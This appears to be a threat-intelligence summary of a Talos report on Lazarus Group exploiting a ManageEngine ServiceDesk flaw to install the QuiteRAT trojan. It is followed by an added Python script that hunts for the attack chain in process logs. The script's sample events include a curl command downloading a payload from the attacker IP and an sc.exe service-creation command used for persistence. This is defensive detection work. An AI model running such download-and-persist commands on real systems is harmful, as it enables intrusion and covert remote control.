Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

2023-08-24 Cisco Talos

https://blog.talosintelligence.com/lazarus-quiterat/


Cisco Talos observed Lazarus Group compromising an internet backbone infrastructure provider in Europe and targeting healthcare entities in the United States by exploiting CVE-2022-47966, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk. The attackers began exploiting the flaw shortly after public proof-of-concept code appeared, using it to download and execute QuiteRAT from Lazarus-controlled infrastructure, including the IP address 146.4.21.94. QuiteRAT is a compact Qt-based remote access trojan derived from, or closely related to, MagicRAT; it fingerprints the host, communicates with its C2 server, executes arbitrary commands through cmd.exe, supports operator-controlled sleep intervals, and can retrieve a secondary C2 address. The implant has no built-in persistence mechanism; the operators instead established persistence with a service-creation command issued through the RAT. Its use of the Qt framework complicates human analysis and weakens some heuristic detection approaches.

Indicators of Compromise

Type   Value                               First Seen   Last Seen
HASH   ed8ec7a8dd089019cfd29143f008fa0…    2023-08-24   2024-07-25
IPv4   146.4.21.94                         2022-09-08   2023-09-22
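The summary above describes a three-step chain (exploitation of the ServiceDesk web application, download of QuiteRAT from 146.4.21.94, and persistence through an operator-issued service-creation command) that maps cleanly onto process-creation telemetry. The following hunting script is an added example, not code from Cisco Talos or from the page, that applies those observations to constructed Windows process-creation events. It assumes that ManageEngine ServiceDesk runs as a Java process (so post-exploitation shells appear as children of java.exe), which the page does not state; the sample events, tag names and the download URL path are constructed for illustration, and only the IP address comes from the IOC table.

```python
"""Hunt for the QuiteRAT post-exploitation chain in process-creation events.

Added example. Indicators: the IOC IPv4 from the page's table, plus two
behavioural signals described in the summary (a shell spawned by the
web application, and a service-creation command used for persistence).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Set, Tuple

# Network indicator taken from the page's IOC table.
IOC_IPV4: Set[str] = {"146.4.21.94"}

# ASSUMPTION (not on the page): ManageEngine ServiceDesk is a Java application,
# so commands run through the exploit appear as children of java.exe/javaw.exe.
WEBAPP_PARENTS: Set[str] = {"java.exe", "javaw.exe"}
SHELLS: Set[str] = {"cmd.exe", "powershell.exe", "pwsh.exe"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Service creation via sc / sc.exe or PowerShell's New-Service.
SERVICE_CREATE_RE = re.compile(
    r"\b(?:sc(?:\.exe)?\s+create|new-service)\b", re.IGNORECASE
)


@dataclass
class ProcEvent:
    """Minimal process-creation record (e.g. Sysmon EID 1 / Security 4688)."""
    host: str
    parent_image: str
    image: str
    command_line: str


def ioc_ip_hits(command_line: str) -> Set[str]:
    """Return the IOC IPv4 addresses referenced in a command line."""
    return set(IPV4_RE.findall(command_line)) & IOC_IPV4


def classify(ev: ProcEvent) -> List[str]:
    """Tag one event with every matching indicator, in a fixed order."""
    tags: List[str] = []
    if ioc_ip_hits(ev.command_line):
        tags.append("ioc_ip")
    if ev.parent_image.lower() in WEBAPP_PARENTS and ev.image.lower() in SHELLS:
        tags.append("webapp_spawned_shell")
    if SERVICE_CREATE_RE.search(ev.command_line):
        tags.append("service_creation")
    return tags


def hunt(events: List[ProcEvent]) -> List[Tuple[str, str, List[str]]]:
    """Return (host, image, tags) for every tagged event, most tags first."""
    tagged = [(ev.host, ev.image, classify(ev)) for ev in events]
    return sorted((t for t in tagged if t[2]), key=lambda t: -len(t[2]))


# Constructed sample telemetry; the download path is invented for illustration.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent("sd-01", "java.exe", "cmd.exe",
              r"cmd.exe /c curl http://146.4.21.94/update.bin -o C:\Windows\Temp\update.bin"),
    ProcEvent("sd-01", "cmd.exe", "sc.exe",
              r'sc.exe create WinUpdateSvc binPath= "C:\Windows\Temp\update.bin" start= auto'),
    ProcEvent("ws-07", "explorer.exe", "cmd.exe", r"cmd.exe /c dir C:\Users"),
]

if __name__ == "__main__":
    for host, image, tags in hunt(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(tags)}")
```

The first sample event carries two signals at once (the IOC address and a shell under the web-application process), so it sorts to the top; the service-creation event on its own is weaker and would need the host correlation a SIEM provides, which is why the script keys results by host. The IOC table's first-seen and last-seen dates bound how far back such a hunt is worth running for the address indicator.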
